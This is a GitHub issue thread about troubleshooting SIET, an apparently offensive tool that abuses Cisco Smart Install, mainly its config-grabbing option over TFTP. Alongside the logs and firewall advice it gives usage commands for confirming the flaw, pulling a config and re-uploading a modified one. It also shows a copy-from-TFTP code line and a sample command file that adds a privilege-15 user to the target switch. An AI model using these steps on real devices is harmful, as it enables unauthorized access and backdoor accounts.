When running -g nothing is grabbed
usmarine2141 opened this issue · 17 comments
When running the get config (-g) no config is actually downloaded.
or does it keep it on the device itself and then go grab it?
Here is a output that happens on occasions
-= DvK =- TFTP server 2017(p)
[INFO]: Directory already exists. OK.
[INFO]: binding socket .. ok
[INFO]: Sending TCP packet to 192.168.200.254
[INFO]: Package send success to 192.168.200.254:
[INFO]: Getting config done
[INFO]: All done! Waiting 60 seconds for end of connections...
[INFO]: connect from
Traceback (most recent call last):
File "sTFTP.py", line 149, in
TftpServer('', TFTP_SOCK_TIMEOUT)
File "sTFTP.py", line 43, in TftpServer
print '[INFO]: connect from ', raddress, rport
UnboundLocalError: local variable 'raddress' referenced before assignment
Is your attacking host accessible to the internet on UDP port 69? The vulnerable device must be able to reach the included TFTP server provided by SIET.
Per the README, using -g SIET first modifies the TFTP server on the vulnerable device and then issues a command for it to copy off the config to the previously transferred TFTP server address.
Firewall between you and victim can block incoming packets sometimes. In some case it is empty configuration file, and I donno why )
You can try to run Wireshark and see what gonna happen.
It appears the TFTP server isnt running. I have many ports forwarded to this box, and port 69 is one of them. UDP and TCP and it is still not showing it as being able to see it while running the -g command, but when checking on my ssh port it sees it without an issue.
I have also just tried to run python sTFTP.py on its own and test with the port and it is not showing up.
I have opened ports in the local firewall for port 69, and even turned it off.
This was ran while python siet.py -g -t x.x.x.x was being ran
What OS are you using?
You also don't see port 69 in sudo netstat -tulpn ?
You can open udp port by yourself with sudo netcat -ul 69 and try to get configuration file into it.
Not Sure if you still develop this tools,
I tried the -e option, the msg is showing the file was uploaded but actually not.
c3 = 'copy tftp://' + my_ip + '/' + exec_file + ' flash:'
I am not sure if the complete copy command is needed in this case, I have revised the code, but no luck.
Any command on this issue?
I can't undestand what you exactly want to do.
With -e option you give command to device for upload your's file with commands list. In new IOS this list will executed.
Copy is standard cisco command, that need destination for upload file and I don't see another way to do that.
https://www.cisco.com/c/en/us/td/docs/ios/fundamentals/command/reference/cf_book/cf_c1.html
I use -e, the tftp log told the config file is uploaded successfully, but when I checked on SW, the config file was not uploaded. (show flash: on 2960s)
I tried to run the sTFTP alone, and uploaded the config file from device to sw manually, it is ok!
First -e is not for config files. It's a command list only. For config file use -g and -c.
If you can write Wireshark dump when you uploaded the config file from device to sw manually, it will be very helpful.
I will later provide you the pyshark dump.
But isn't the -e an option that is used to execute command toward the affected device by reading the config file?
My purpose is to change the device config~
there is two option after -e, one is "d", the other is file path.
And then a execute.txt or my_exe.txt will be created at tftp directory.
But none of the files will be uploaded to the affected sw~
Do you have slack for a discussion?
With -e option you will execute commands from file.
For example:
cat tftp/execute.txt
"username cisco privilege 15 secret 0 cisco"
"exit"
After uploading this file cisco device will create new user.
If you want to change config of device, you have to use -c option.
But this option work only for 3.6.0E+ and 15.2(2)E+ IOS versions.
I gave link to my presentation slides in readme and you can read this for more explanations.
I have telegram account: @Sab0tag3d (https://t.me/sab0tag3d)
Hello, first off I want to say I love Your tool. I have done well securing stuff with this made money via bounties and also learned allot and created a diff toolkit based off this tools findings you are awesome.
Now the thing I have noticed is if you are having trouble with the tftp code either reboot or do a ps aux | grep tftp
If you see processes just kill them, if that doesn't alleviate the problem than You more than likely are dealing with a NAT issue.
On a side note also like the owner said the -e switch is used to provide the device with a command, and that only works on newer versions.
python siet.py -t -i ip -> confirm vuln
python siet.py -g -i ip -> grab config
python siet.py -c -i ip -> re upload presumably modified config
I'm getting the same issue. It might be worth adding a message to say that the file transfer was not successful if it fails. I think the confusion comes from the fact that the tool outputs positive success messages regardless of whether the config download was successful.
I think it is great idea. We can check file for zero size and if it is, show message that something go wrong.
in Linux kali 5.9.0-kali1-amd64 #1 SMP Debian 5.9.1-1kali2 (2020-10-29) x86_64 GNU/Linux When running the get config (-g) no config is actually downloaded.
Here is a output that happens on occasions:
python siet.py -g -i 192.168.30.29
[INFO]: Sending TCP packet to 192.168.30.29
[INFO]: Package send success to 192.168.30.29:
[INFO]: Getting config done
[INFO]: All done! Waiting 60 seconds for end of connections...
-= DvK =- TFTP server 2017(p)
[INFO]: Directory already exists. OK.
[INFO]: binding socket .. ok
but when I used Linux kali 5.10.0-kali8-amd64 #1 SMP Debian 5.10.40-1kali1 (2021-05-31) x86_64 GNU/Linux, When running the get config (-g) config is downloaded.
Here is a output that happens on occasions:
python siet.py -g -i 192.168.30.29
[INFO]: Sending TCP packet to 192.168.30.29
[INFO]: Package send success to 192.168.30.29:
[INFO]: Getting config done
[INFO]: All done! Waiting 60 seconds for end of connections...
-= DvK =- TFTP server 2017(p)
[INFO]: Directory already exists. OK.
[INFO]: binding socket .. ok
[INFO]: connect from 192.168.30.29 55045
[INFO]:[192.168.30.29] puting file 192.168.30.29.conf octet
[INFO]:[192.168.30.29]:[put] success binding data port 44000
[INFO]:[192.168.30.29]:[put] file tftp/192.168.30.29.conf finish download, size: 3804
I checked both of them in Wireshark:
I don't know why TFTP don't work!
in Linux kali 5.9.0-kali1-amd64 #1 SMP Debian 5.9.1-1kali2 (2020-10-29) x86_64 GNU/Linux When running the get config (-g) no config is actually downloaded.
Here is a output that happens on occasions:
python siet.py -g -i 192.168.30.29
[INFO]: Sending TCP packet to 192.168.30.29
[INFO]: Package send success to 192.168.30.29:
[INFO]: Getting config done
[INFO]: All done! Waiting 60 seconds for end of connections...
-= DvK =- TFTP server 2017(p)
[INFO]: Directory already exists. OK.
[INFO]: binding socket .. okbut when I used Linux kali 5.10.0-kali8-amd64 #1 SMP Debian 5.10.40-1kali1 (2021-05-31) x86_64 GNU/Linux, When running the get config (-g) config is downloaded.
Here is a output that happens on occasions:python siet.py -g -i 192.168.30.29
[INFO]: Sending TCP packet to 192.168.30.29
[INFO]: Package send success to 192.168.30.29:
[INFO]: Getting config done
[INFO]: All done! Waiting 60 seconds for end of connections...
-= DvK =- TFTP server 2017(p)
[INFO]: Directory already exists. OK.
[INFO]: binding socket .. ok
[INFO]: connect from 192.168.30.29 55045
[INFO]:[192.168.30.29] puting file 192.168.30.29.conf octet
[INFO]:[192.168.30.29]:[put] success binding data port 44000
[INFO]:[192.168.30.29]:[put] file tftp/192.168.30.29.conf finish download, size: 3804I checked both of them in Wireshark:
I don't know why TFTP don't work!
As you could see in the dump, the server didn't even try to send you TFTP package. If it would be a problem in TFTP server, you will see the package refused.
I guess the issue here is unfortunately how the protocol works. When you send the package the first time, you change the settings of the device and put your IP address (192.168.30.29) as a backup server for configuration files. Next time you send the package with the same address, but the device sees that configuration of the backup server wasn't changed and does nothing. The device will try to send the config file later by schedule. Just open the UPD 69 port for while and hopefully, you will see the device request.